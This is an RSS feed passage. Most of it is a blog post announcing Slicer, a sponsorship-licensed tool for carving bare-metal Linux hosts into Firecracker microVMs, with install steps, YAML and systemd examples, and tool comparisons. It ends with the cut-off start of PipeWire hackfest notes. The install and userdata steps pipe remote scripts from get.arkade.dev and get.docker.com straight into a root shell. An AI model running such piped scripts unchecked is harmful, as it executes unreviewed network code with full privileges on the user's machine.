<guid isPermaLink="false">xtaIk-ji1W1OmxxuABjZeI1KXRUfB-_eU9swBw==</guid>
<pubDate>Tue, 23 Jun 2026 06:43:04 +0000</pubDate>
<description>The easiest and best supported way to learn and deploy Firecracker and microVMs.</description>
<content:encoded>&lt;p&gt;By popular request, we&amp;#39;re releasing Slicer, our much used internal tool from OpenFaaS Ltd for efficiently slicing up bare metal into microVMs.&lt;/p&gt;&lt;blockquote&gt;
&lt;p&gt;Since this blog post, there&amp;#39;s &lt;a href=&quot;https://docs.slicervm.com&quot;&gt;official documentation&lt;/a&gt; with use-cases and examples, and a &lt;a href=&quot;https://slicervm.com&quot;&gt;landing page&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;&lt;p&gt;I was on a call this week with Lingzhi Wang, of &lt;a href=&quot;https://www.northwestern.edu/&quot;&gt;Northwestern University&lt;/a&gt; in the USA. He told me he was doing a research project on intrusion detection with &lt;a href=&quot;https://openfaas.com&quot;&gt;OpenFaaS&lt;/a&gt;, and had access to a powerful machine.&lt;/p&gt;&lt;p&gt;When I asked how powerful the machine was, his reply shocked me:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;128 Cores&lt;/li&gt;
&lt;li&gt;1.5 TB of RAM&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;My next question surprised him.&lt;/p&gt;&lt;p&gt;How many Kubernetes Pods, do you think you can run on that huge machine?&lt;/p&gt;&lt;p&gt;I answered: only 100. &lt;code&gt;[1]&lt;/code&gt;&lt;/p&gt;&lt;p&gt;He was installing &lt;a href=&quot;https://k3s.io&quot;&gt;K3s&lt;/a&gt; (&lt;a href=&quot;https://kubernetes.io/&quot;&gt;Kubernetes&lt;/a&gt;) directly onto the host, which when coupled with a 100 Pod limit is a huge waste of resources.&lt;/p&gt;&lt;p&gt;Enter slicer, and the original reason we created it.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;If you&amp;#39;ve not seen a demo of my slicer tool yet..&lt;br/&gt;&lt;br/&gt;It takes a bare-metal host and partitions it into dozens of Firecracker VMs in ~ 1-2s. From there you can do whatever you want via SSH&lt;br/&gt;&lt;br/&gt;In my screenshot &amp;quot;k3sup plan&amp;quot; created a 25-node HA cluster&lt;a href=&quot;https://t.co/WpG2v3RPK7&quot;&gt;https://t.co/WpG2v3RPK7&lt;/a&gt; &lt;a href=&quot;https://t.co/Wbz5Szk1BI&quot;&gt;pic.twitter.com/Wbz5Szk1BI&lt;/a&gt;&lt;/p&gt;— Alex Ellis (@alexellisuk) &lt;a href=&quot;https://twitter.com/alexellisuk/status/1716759592795885976?ref_src=twsrc%5Etfw&quot;&gt;October 24, 2023&lt;/a&gt;&lt;/blockquote&gt;&lt;p&gt;The original use-case was for customer support for our line of Kubernetes products such as OpenFaaS and Inlets Uplink.&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;Build a large cluster capable of running thousands of Pods on a single machine - blasting that 100 Pod per node limit&lt;/li&gt;
&lt;li&gt;Learn how far we can push OpenFaaS before we start to see intolerable latency on &lt;code&gt;faas-cli list&lt;/code&gt;, &lt;code&gt;faas-cli deploy&lt;/code&gt;, etc.&lt;/li&gt;
&lt;li&gt;Optimise the cost of long-running burn-in tests and customer simulations&lt;/li&gt;
&lt;li&gt;Simulate spot-instance behaviour - node addition/removal through &lt;a href=&quot;https://firecracker-microvm.github.io&quot;&gt;Firecracker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Chaos testing - what happens when the network disconnects? This was used to fix a mysterious production issue for a customer where informers were disconnecting after network interruptions&lt;/li&gt;
&lt;li&gt;Test our code on Arm and x86_64 hosts&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;Key features that make it ideal for running production workloads:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;Fast storage pool for instant clone of new VMs&lt;/li&gt;
&lt;li&gt;Run with a disk file for persistent workloads&lt;/li&gt;
&lt;li&gt;Boot time ~ 1s including systemd&lt;/li&gt;
&lt;li&gt;Proven at scale in &lt;a href=&quot;https://actuated.com&quot;&gt;actuated&lt;/a&gt; running millions of jobs for top-tier CNCF projects&lt;/li&gt;
&lt;li&gt;Serial Over SSH console to enable access when the network is down&lt;/li&gt;
&lt;li&gt;Disk management utilities for migration&lt;/li&gt;
&lt;li&gt;Multi-host support for even larger slicer deployments&lt;/li&gt;
&lt;li&gt;Near-instant destruction of hosts&lt;/li&gt;
&lt;li&gt;GPU mounting via VFIO for Ollama&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;What about for individuals and hobbyists?&lt;/p&gt;&lt;p&gt;Slicer is probably the easiest and best-supported tool for working with &lt;a href=&quot;https://firecracker-microvm.github.io/&quot;&gt;Firecracker&lt;/a&gt; and microVMs.&lt;/p&gt;&lt;p&gt;The OS images and kernels have been specially tuned for container workloads whilst working with various CNCF projects building actuated - our managed GitHub Actions offering. The documentation site gets you from zero to a Firecracker Kubernetes cluster within single-digit minutes.&lt;/p&gt;&lt;p&gt;So you get to have fun with your lab again, an excuse to buy an &lt;a href=&quot;https://blog.alexellis.io/n100-mini-computer/&quot;&gt;N100&lt;/a&gt; or Beelink - a way to experiment and learn in an isolated environment.&lt;/p&gt;&lt;h2&gt;What is a preview?&lt;/h2&gt;&lt;p&gt;Slicer is already suitable for productive R&amp;amp;D/support uses and long-running production workloads.&lt;/p&gt;&lt;p&gt;So why is this being called a preview? It&amp;#39;s an internal tool, which we have been using since ~ 2022 along with actuated.&lt;/p&gt;&lt;p&gt;The preview refers to making it consumable and useful as a public offering.&lt;/p&gt;&lt;h2&gt;Enough talking, I just want to see it running&lt;/h2&gt;&lt;p&gt;You can watch a brief demo here:&lt;/p&gt;&lt;blockquote&gt;
&lt;p&gt;The demo features the Serial Over SSH (SOS) console which is great for chaos testing and debugging tricky issues without relying on networking.&lt;/p&gt;
&lt;/blockquote&gt;&lt;h2&gt;Stacking value - autoscaling Kubernetes - on your own hardware&lt;/h2&gt;&lt;p&gt;With the original versions of Slicer, we were already able to stand up an HA K3s cluster within about a minute, but with the new version, we can autoscale nodes through the upstream Kubernetes Cluster Autoscaler project.&lt;/p&gt;&lt;p&gt;This is the pinnacle of cool for me, but it has a real purpose - OpenFaaS customers run on spot instances and autoscaling groups. Typically you just can&amp;#39;t reproduce that on your own kit.&lt;/p&gt;&lt;p&gt;I&amp;#39;ll be putting up our fork of the Cluster Autoscaler project on GitHub soon.&lt;/p&gt;&lt;h3&gt;K3sup Pro if you need K3s&lt;/h3&gt;&lt;p&gt;Whilst &lt;a href=&quot;https://k3sup.dev&quot;&gt;K3sup&lt;/a&gt; CE with its &lt;code&gt;k3sup install/join&lt;/code&gt; commands is ideal for experimentation, K3sup Pro was built to satisfy long-standing requests for an IaC/GitOps experience.&lt;/p&gt;&lt;p&gt;K3sup Pro adds Terraform-like &lt;code&gt;plan&lt;/code&gt; and &lt;code&gt;apply&lt;/code&gt; commands to automate installations both small and large - running in parallel.&lt;/p&gt;&lt;p&gt;What&amp;#39;s more, the plan command accepts the output from Slicer&amp;#39;s API, so you can run &lt;code&gt;slicer up&lt;/code&gt; then &lt;code&gt;k3sup plan/apply&lt;/code&gt; and you have a kubeconfig for an HA K3s cluster within a minute or two.&lt;/p&gt;&lt;p&gt;The plan file can be customised and retained in Git for maintenance and updates.&lt;/p&gt;&lt;p&gt;K3sup Pro is a huge time saver, and free for my GitHub Sponsors.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://github.com/alexellis/k3sup?tab=readme-ov-file#k3sup-pro&quot;&gt;Learn more about K3sup Pro&lt;/a&gt;&lt;/p&gt;&lt;h2&gt;Everything you get for the price of a coffee&lt;/h2&gt;&lt;blockquote&gt;
&lt;p&gt;&amp;quot;Oh, I expected it to be free.&amp;quot;&lt;/p&gt;
&lt;/blockquote&gt;&lt;p&gt;OpenFaaS was one of the first projects I built, and it was open-source from the start. Many people remember me for that. But those were different times, and now we need to fund salaries to enable full-time R&amp;amp;D and support.&lt;/p&gt;&lt;p&gt;In a way this reaction is a good thing - there are so many free tools available to you. With Slicer Home Edition, we self-select the people who really want to use the software and want to join a community of self-hosters, home-labbers, and cloud native developers.&lt;/p&gt;&lt;p&gt;At some point in the future, we may move Slicer Home Edition to a &amp;quot;Once&amp;quot; model: pay once and use it forever. Something like 295 USD one-off, for lifetime access.&lt;/p&gt;&lt;p&gt;If you&amp;#39;re already a sponsor, you get all of the below to play with as much as you like for free, so long as it&amp;#39;s not used at or for your work/business/dayjob.&lt;/p&gt;&lt;p&gt;Included for 25 USD / mo is:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://blog.alexellis.io/slicer-bare-metal-preview/&quot;&gt;Slicer Home Edition&lt;/a&gt; - for developers and homelabs - slicer up bare metal into lightweight microVMs&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/alexellis/k3sup&quot;&gt;K3sup Pro&lt;/a&gt; - plan and apply K3s installations, with a terraform style approach - run in parallel&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.openfaas.com/edge/overview/&quot;&gt;OpenFaaS Edge&lt;/a&gt; - includes many of the commercial features of OpenFaaS - but licensed only for your personal use (not at/for work)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.actuated.com/tasks/debug-ssh/&quot;&gt;Debug GitHub Actions&lt;/a&gt; jobs over SSH using the ssh gateway by &lt;a href=&quot;https://actuated.com&quot;&gt;actuated&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Direct access to &lt;a href=&quot;https://insiders.alexellis.io/&quot;&gt;my sponsors portal&lt;/a&gt;, with all my past sponsor emails and 20% off my eBooks&lt;/li&gt;
&lt;li&gt;50% off a 1:1 meeting with me via Zoom for advice &amp;amp; direction in the portal&lt;/li&gt;
&lt;li&gt;Access to the private Discord server for help and discussion&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;The first five people to Tweet a screenshot of their machine running Slicer will win a limited edition SlicerVM.com Test Pilot mug. &lt;a href=&quot;https://help.printful.com/hc/en-us/articles/360014066779-Are-there-any-shipping-restrictions&quot;&gt;Shipping restrictions&lt;/a&gt; may apply.&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://blog.alexellis.io/content/images/2025/09/slicer-mug.png&quot; alt=&quot;Image of the SlicerVM.com Test Pilot mug&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;blockquote&gt;
&lt;p&gt;The limited edition SlicerVM.com Test Pilot mug.&lt;/p&gt;
&lt;/blockquote&gt;&lt;h2&gt;Quick and dirty installation of Slicer&lt;/h2&gt;&lt;p&gt;You&amp;#39;ll need a sponsorship as mentioned above. This is used to activate your Slicer installation.&lt;/p&gt;&lt;p&gt;Within the sponsorship, you &lt;em&gt;also get&lt;/em&gt; free access to K3sup Pro with its plan and apply features that take the output from Slicer and install a multi-master HA K3s cluster all in parallel.&lt;/p&gt;&lt;p&gt;These instructions are quick - and dirty. More will follow, but the technical amongst us will have no issues overlooking this for now.&lt;/p&gt;&lt;p&gt;You will need a system with Linux installed - I recommend Ubuntu 22.04 or 24.04. Arch Linux and RHEL-like systems should also work but I can&amp;#39;t support you directly.&lt;/p&gt;&lt;p&gt;The point is that a host running slicer is dedicated to this one task, not a general purpose system with all kinds of other software installed.&lt;/p&gt;&lt;p&gt;First use the &lt;a href=&quot;https://actuated.com&quot;&gt;actuated&lt;/a&gt; installer to install the pre-requisites. We aren&amp;#39;t using actuated here, but they share a lot of DNA.&lt;/p&gt;&lt;p&gt;In time, we&amp;#39;ll spin out a separate installer for Slicer.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-bash&quot;&gt;mkdir -p ~/.actuated
touch ~/.actuated/LICENSE

(
# Install arkade
curl -sLS https://get.arkade.dev | sudo sh

# Use arkade to extract the agent from its OCI container image
arkade oci install ghcr.io/openfaasltd/actuated-agent:latest --path ./agent
chmod +x ./agent/agent*
sudo mv ./agent/agent* /usr/local/bin/
)

(
cd agent
sudo -E ./install.sh
)&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Next, get the Slicer binary itself:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-bash&quot;&gt;sudo -E arkade oci install ghcr.io/openfaasltd/slicer:latest --path /usr/local/bin&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Once you have the Slicer binary, activate it with your new or existing &lt;a href=&quot;https://github.com/sponsors/alexellis&quot;&gt;GitHub Sponsorship&lt;/a&gt;.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-bash&quot;&gt;slicer activate&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Any colour you want, so long as it&amp;#39;s black&lt;/h2&gt;&lt;p&gt;This phrase has been attributed to Henry Ford, and it applies to Slicer too.&lt;/p&gt;&lt;p&gt;Slicer is made for cloud development, and production workloads. It&amp;#39;s Linux only, x86_64 and Arm64.&lt;/p&gt;&lt;p&gt;We use Ubuntu LTS for all of our workstation and server deployments at OpenFaaS Ltd, so the root filesystem is Ubuntu based.&lt;/p&gt;&lt;p&gt;There is also a Rocky Linux image for those who prefer a RHEL-like experience, or need to work with RHEL/Fedora deployments for customer support.&lt;/p&gt;&lt;h2&gt;A quick template for a VM&lt;/h2&gt;&lt;p&gt;Slicer uses a YAML file to define a host group, and then a number (&lt;code&gt;count&lt;/code&gt;) of VMs to create within that group. 
If you start it up with a count of &lt;code&gt;0&lt;/code&gt;, then you can use the API or CLI (&lt;code&gt;slicer vm add&lt;/code&gt;) to create hosts later.&lt;/p&gt;&lt;p&gt;We&amp;#39;ll cover customisation a bit later on, but for now, let&amp;#39;s get something working - and then you can connect via SSH and customise the VM to your heart&amp;#39;s content.&lt;/p&gt;&lt;p&gt;There are various configuration options and settings for storage and networking, so I&amp;#39;m going to give you the most basic to get started with.&lt;/p&gt;&lt;p&gt;We&amp;#39;ll start by using a plain disk image, which is slower to create, but is persistent across reboots and doesn&amp;#39;t require us to consider a production-ready configuration of something like ZFS.&lt;/p&gt;&lt;p&gt;Create &lt;code&gt;vm-image.yaml&lt;/code&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-yaml&quot;&gt;config:
  host_groups:
  - name: vm
    storage: image
    storage_size: 25G
    count: 1
    vcpu: 2
    ram_gb: 4
    network:
      bridge: brvm0
      tap_prefix: vmtap
      gateway: 192.168.137.1/24

  github_user: alexellis

  kernel_image: &amp;quot;ghcr.io/openfaasltd/actuated-kernel:5.10.240-x86_64-latest&amp;quot;
  image: &amp;quot;ghcr.io/openfaasltd/slicer-systemd:5.10.240-x86_64-latest&amp;quot;

  api:
    port: 8080
    bind_address: &amp;quot;127.0.0.1:&amp;quot;
    auth:
      enabled: true
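      # A hedged aside, not part of the original config: with auth enabled,
      # API requests need the token printed at start-up, for example
      #   curl -H &amp;quot;Authorization: Bearer $TOKEN&amp;quot; http://127.0.0.1:8080
      # where TOKEN is a hypothetical shell variable holding that token.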

  ssh:
    port: 2222
    bind_address: &amp;quot;0.0.0.0:&amp;quot;

  hypervisor: firecracker&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;For a Raspberry Pi 5 with an NVMe drive, or any kind of other Arm64 server, change the image and kernel as follows:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-diff&quot;&gt;-  kernel_image: &amp;quot;ghcr.io/openfaasltd/actuated-kernel:5.10.240-x86_64-latest&amp;quot;
-  image: &amp;quot;ghcr.io/openfaasltd/slicer-systemd:5.10.240-x86_64-latest&amp;quot;
+  kernel_image: &amp;quot;ghcr.io/openfaasltd/actuated-kernel:6.1.90-aarch64-latest&amp;quot;
+  image: &amp;quot;ghcr.io/openfaasltd/slicer-systemd-arm64:6.1.90-aarch64-latest&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Run the following:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-bash&quot;&gt;sudo -E slicer up ./vm-image.yaml&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The kernel and root filesystem will be downloaded and unpacked into containerd. These will then be used to clone a new disk of the size set via &lt;code&gt;storage_size&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;Feel free to customise the &lt;code&gt;count&lt;/code&gt;, which is the number of VMs to create in the group, and the &lt;code&gt;vcpu&lt;/code&gt; or &lt;code&gt;ram_gb&lt;/code&gt; fields.&lt;/p&gt;&lt;p&gt;You can connect to the API via &lt;code&gt;http://127.0.0.1:8080&lt;/code&gt; - make sure you use the &lt;code&gt;Authorization: Bearer&lt;/code&gt; header along with the token generated on start-up.&lt;/p&gt;&lt;p&gt;The Serial Over SSH console is also available at &lt;code&gt;ssh -p 2222 user@127.0.0.1&lt;/code&gt; and is exposed on all interfaces, so you can connect to it remotely.&lt;/p&gt;&lt;p&gt;The &lt;code&gt;github_user&lt;/code&gt; field is used to pre-program an &lt;code&gt;authorized_keys&lt;/code&gt; entry for your user, so make sure the SSH keys on your GitHub user profile are up to date.&lt;/p&gt;&lt;p&gt;You will generally not SSH into a machine on the host itself, but from your laptop or workstation, or even remotely. 
Make sure that you read the output when Slicer starts up as it&amp;#39;ll show you how to add the route for Linux and macOS.&lt;/p&gt;&lt;p&gt;Then whenever you&amp;#39;re ready you can connect directly to the VM over SSH using the &lt;code&gt;ubuntu&lt;/code&gt; user:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-bash&quot;&gt;ssh ubuntu@192.168.137.2&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;You can &amp;quot;reset&amp;quot; the VM by hitting Control + C, then running &lt;code&gt;rm -rf vm-1.img&lt;/code&gt;, followed by restarting Slicer.&lt;/p&gt;&lt;p&gt;Bear in mind that the SSH host key will have changed, so run:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-bash&quot;&gt;ssh-keygen -R 192.168.137.2&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Running Slicer as a daemon&lt;/h2&gt;&lt;p&gt;Sometimes when we&amp;#39;re doing much longer term testing, we&amp;#39;ll set up Slicer to run as a systemd service, so when machines are powered off for the weekend (to save power), everything is ready and waiting exactly as we left it once they are powered back on.&lt;/p&gt;&lt;p&gt;To make Slicer permanent, create a systemd unit file, e.g. &lt;code&gt;vm.service&lt;/code&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-ini&quot;&gt;[Unit]
Description=Slicer

[Service]
User=root
Type=simple
WorkingDirectory=/home/alex
ExecStart=sudo -E /usr/local/bin/slicer up \
  /home/alex/vm-image.yaml \
  --license-file /home/alex/.slicer/LICENSE
Restart=always
RestartSec=30s
KillMode=mixed
TimeoutStopSec=30
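# To enable and start this unit, assuming it is saved as
# /etc/systemd/system/vm.service (a path the post does not specify):
#   sudo systemctl daemon-reload
#   sudo systemctl enable --now vm.service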

[Install]
WantedBy=multi-user.target&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Then enable the service and start it.&lt;/p&gt;&lt;p&gt;You can have multiple slicer daemons running so long as their networking and host group names do not clash.&lt;/p&gt;&lt;h2&gt;How do I customise the image or setup userdata?&lt;/h2&gt;&lt;p&gt;The preferred way to customise an image is to supply a userdata script. Note this is not cloud-init, but a bash script. Formal cloud-init makes starting microVMs very slow which is a non-goal for us here.&lt;/p&gt;&lt;p&gt;The userdata script will run as root on first boot.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-diff&quot;&gt;config:
  host_groups:
  - name: vm
+   userdata: |
+      #!/bin/bash
+      echo &amp;quot;Enabling nginx&amp;quot;
+      apt-get update
+      apt-get install -y nginx
+      systemctl enable nginx --now&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Or perhaps install Docker, and make the default user able to access the daemon:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-diff&quot;&gt;config:
  host_groups:
  - name: vm
+   userdata: |
+      #!/bin/bash
+      echo &amp;quot;Enabling Docker&amp;quot;
+      curl -sLS https://get.docker.com | sh
+      usermod -aG docker ubuntu&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;For a more permanent setup, you could simply take the root filesystem, and extend it via Docker, publish a new image and then update your YAML file.&lt;/p&gt;&lt;p&gt;i.e.&lt;/p&gt;&lt;p&gt;You could publish this new image via a CI pipeline using GitLab CI, GitHub Actions, or just a regular bash script or cron job.&lt;/p&gt;&lt;p&gt;Then update your &lt;code&gt;vm-image.yaml&lt;/code&gt; to use your new image:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;hljs language-diff&quot;&gt;config:
  host_groups:
  - name: vm
-    image: &amp;quot;ghcr.io/openfaasltd/slicer-systemd:5.10.240-x86_64-latest&amp;quot;
+    image: &amp;quot;docker.io/alexellis2/slicer-nginx:5.10.240-x86_64-latest&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;You can also create hosts via API, passing along your custom userdata script, which is the technique I used in the Cluster Autoscaler demo above.&lt;/p&gt;&lt;h2&gt;How does Slicer compare to other tools I already know?&lt;/h2&gt;&lt;p&gt;lxd/multipass - this was the first tool I tried to use when testing large scale deployments of Kubernetes. We had already built-up experience with multipass and recommend it for testing OpenFaaS Edge / faasd CE. But it took about 3 minutes to launch each VM, and even longer to delete them. It was so painfully slow, and we&amp;#39;d already built up so much operational knowledge of microVMs through &lt;a href=&quot;https://actuated.com&quot;&gt;actuated&lt;/a&gt;, that we decided to build our own tool.&lt;/p&gt;&lt;p&gt;Incus - a fork of lxd with lofty ambitions - many moving parts need to be understood, configured and decisions made before you can launch a VM. It&amp;#39;s designed to be general purpose and even covers its own internal clustering, which in my mind makes it the Kubernetes of VM tools - make of that what you want.&lt;/p&gt;&lt;p&gt;QEMU/libvirt - the syntax for qemu is cryptic at best, and just not built to manage multiple VMs. libvirt is living in the 90s, it requires a lot of boilerplate XML and the networking is too low level for working quickly. Unlike microVMs, QEMU can run Windows, macOS, and other OSes.&lt;/p&gt;&lt;p&gt;Kata Containers - Kata Containers is a project designed to run individual Pods (workloads), not Kubernetes nodes within microVMs.&lt;/p&gt;&lt;p&gt;kubevirt - kubevirt is an attempt to make VMs a workload similar to Pods in Kubernetes. It is naturally slower, more cumbersome and requires a Kubernetes cluster to function. 
I&amp;#39;ve often seen it used in homelabs to run Windows.&lt;/p&gt;&lt;p&gt;Proxmox VE - the much beloved tool of the home-lab community, despite being something of a kitchen sink, and rather heavyweight. So if you cut your teeth on &amp;quot;click and point ops&amp;quot; and enjoy something that makes you feel like a VMware admin, then it&amp;#39;s probably a good option to consider instead of Slicer.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://actuated.com/&quot;&gt;actuated&lt;/a&gt; - managed self-hosted runners for GitHub Actions and GitLab CI, where the runners are launched in one-shot microVMs on your own cloud.&lt;/p&gt;&lt;h3&gt;Slicer is to microVMs, what Docker was to Linux namespaces&lt;/h3&gt;&lt;p&gt;Slicer is a modern alternative focused on super fast creation and deletion of microVMs. It comes with SSH preconfigured, and systemd installed, along with just enough Kernel drivers to run containers, Kubernetes, and eBPF. It&amp;#39;s fast and lean, and only does just enough for R&amp;amp;D and running production applications.&lt;/p&gt;&lt;p&gt;Slicer was written by a developer for making efficient use of large bare-metal hosts, but is equally at home on a Hetzner Robot / Auction instance, splitting up a 16 core / 128GB A102 host into 3-5 dedicated microVMs for various production applications - or a production-ready K3s cluster.&lt;/p&gt;&lt;p&gt;Slicer is a daemon, and can be run with systemd so it&amp;#39;s always there when your machine reboots.&lt;/p&gt;&lt;p&gt;Slicer comes with a Serial Over SSH console for easy out of band access. Its API can be used to add and remove hosts dynamically and rapidly for autoscaling.&lt;/p&gt;&lt;p&gt;And unlike the other tools I mentioned, Slicer is equally at home running one-shot tasks like CI jobs, autoscaled Kubernetes nodes, isolated environments for AI agents, and any other kind of serverless task.&lt;/p&gt;&lt;blockquote&gt;
&lt;p&gt;Demo of one-shot / API mode&lt;/p&gt;
&lt;/blockquote&gt;&lt;h2&gt;Wrapping up&lt;/h2&gt;&lt;p&gt;The Slicer Preview is strictly licensed as a &amp;quot;Home Edition&amp;quot; for use by individuals, it is not licensed for use within or for a business - this will require a &lt;a href=&quot;mailto:contact@openfaas.com&quot;&gt;commercial agreement&lt;/a&gt;. But having said that, feel free to try it out and get back to me via Twitter &lt;a href=&quot;https://x.com/alexellisuk&quot;&gt;@alexellisuk&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;Get started:&lt;/p&gt;&lt;ol&gt;
&lt;li&gt;Become a &lt;a href=&quot;https://github.com/sponsors/alexellis&quot;&gt;GitHub sponsor&lt;/a&gt; at 25 USD / mo or higher, if you are not already.&lt;/li&gt;
&lt;li&gt;Find a machine and install Linux onto it, or go to Hetzner Robot (bare metal cloud) and set up a beefy bare-metal host for 30-40 EUR / month. The &lt;a href=&quot;https://www.hetzner.com/dedicated-rootserver/ex44/&quot;&gt;Intel EX44&lt;/a&gt; is fantastic value. I also talk about the &lt;a href=&quot;https://blog.alexellis.io/n100-mini-computer/&quot;&gt;Intel N100 and other mini PCs in my recent blog post&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Email me at &lt;a href=&quot;mailto:alex@openfaas.com&quot;&gt;alex@openfaas.com&lt;/a&gt; and I&amp;#39;ll send you a Discord invite so we can talk about your use-case, help you get started, and get your feedback.&lt;/li&gt;
&lt;/ol&gt;&lt;p&gt;In the next post we&amp;#39;ll look at:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;How to run the same, but on Arm, e.g. a Raspberry Pi 5 or Asahi Linux on a Mac Mini M1 or M2&lt;/li&gt;
&lt;li&gt;How to use ZFS snapshots and clones for instant boot of new VMs, instead of static disk files&lt;/li&gt;
&lt;li&gt;How to use the &lt;code&gt;slicer vm list&lt;/code&gt;, &lt;code&gt;slicer vm top&lt;/code&gt;, &lt;code&gt;slicer vm exec&lt;/code&gt; commands&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;We have also launched a &lt;a href=&quot;https://docs.slicervm.com&quot;&gt;documentation site&lt;/a&gt; with examples such as:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;Launch a large HA K3s cluster&lt;/li&gt;
&lt;li&gt;Chaos test a Kubernetes operator through its network whilst retaining serial access&lt;/li&gt;
&lt;li&gt;Run multiple isolated, production applications on a bare-metal host on Hetzner&lt;/li&gt;
&lt;li&gt;Autoscale a K3s cluster&lt;/li&gt;
&lt;li&gt;Run a K3s cluster across multiple hosts&lt;/li&gt;
&lt;li&gt;Mount a GPU with Ollama for LLMs&lt;/li&gt;
&lt;li&gt;Run Slicer on your Raspberry Pi&lt;/li&gt;
&lt;li&gt;Run OpenFaaS Edge (Sponsors Edition) or faasd CE on a microVM&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;Based upon your feedback, we&amp;#39;ll add more examples and changes to the CLI, REST API and configuration format.&lt;/p&gt;&lt;p&gt;Whilst you&amp;#39;re getting into things, here are a few more videos on Slicer:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://youtu.be/MHXvhKb6PpA&quot;&gt;Cluster Autoscaling with K3s and the Headroom Controller&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://youtu.be/XCBJ0XNqpWE&quot;&gt;How we use Slicer to slice up bare-metal for customer support &amp;amp; development&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://youtu.be/YMgrbic-8h4&quot;&gt;Mount GPUs into microVMs for LLMs &amp;amp; CI jobs with Slicer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://youtu.be/VhPxqlbwoXE&quot;&gt;Scaling to 15k OpenFaaS Functions with Slicer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://actuated.com/blog/firecracker-container-lab&quot;&gt;Grab your lab coat - we&amp;#39;re building a microVM from a container&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;Footnotes:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;[1]&lt;/code&gt; Yes, in some Kubernetes distributions you can force the default limit above 100 slightly, but on the machine in question, even doubling that limit would not make effective use of the machine&amp;#39;s capabilities. Exercise judgement if/when increasing the limit.&lt;/li&gt;
&lt;/ul&gt;</content:encoded>
</item>
<item>
<title>Notes from the PipeWire Hackfest 2026: Part 2</title>
<link>https://arunraghavan.net/2026/06/notes-from-the-pipewire-hackfest-2026-part-2/</link>
<guid isPermaLink="false">wF-WWMMXlzYf35WXSFh7dK1nUqjWOOMLYrJ-RQ==</guid>
<pubDate>Mon, 22 Jun 2026 19:16:33 +0000</pubDate>
<description></description>
<content:encoded>&lt;div&gt;&lt;p&gt;&lt;em&gt;(these notes are being posted in two parts to make the length more manageable, &lt;a href=&quot;https://arunraghavan.net/2026/06/notes-from-the-pipewire-hackfest-2026-part-1/&quot;&gt;part 1 is here&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;&lt;p&gt;Continuing from where we left off, about topics discussed at the PipeWire hackfest in Nice…&lt;/p&gt;&lt;h3&gt;DSP features&lt;/h3&gt;&lt;p&gt;We discussed a number of features related to digital signal processing blocks which are typically realised on specialised hardware (often a DSP core that can directly interface with physical audio inputs and outputs on your laptop/phone/…).&lt;/p&gt;&lt;p&gt;There is currently no standard way for the firmware running on these DSPs to signal what features can be realised directly on DSP. We also would want to allow such features, if exposed from PipeWire, to be realisable on CPU.&lt;/p&gt;&lt;p&gt;Now we do have a way to hide away signal processing in a specific node, which is the &lt;code&gt;filter-graph&lt;/code&gt; parameter on the &lt;code&gt;audioconvert&lt;/code&gt; node that wraps all audio nodes.&lt;/p&gt;&lt;p&gt;We could extend this mechanism to allow the internal node (say the ALSA node implementation), to expose what filtering it can perform “in hardware” (i.e. 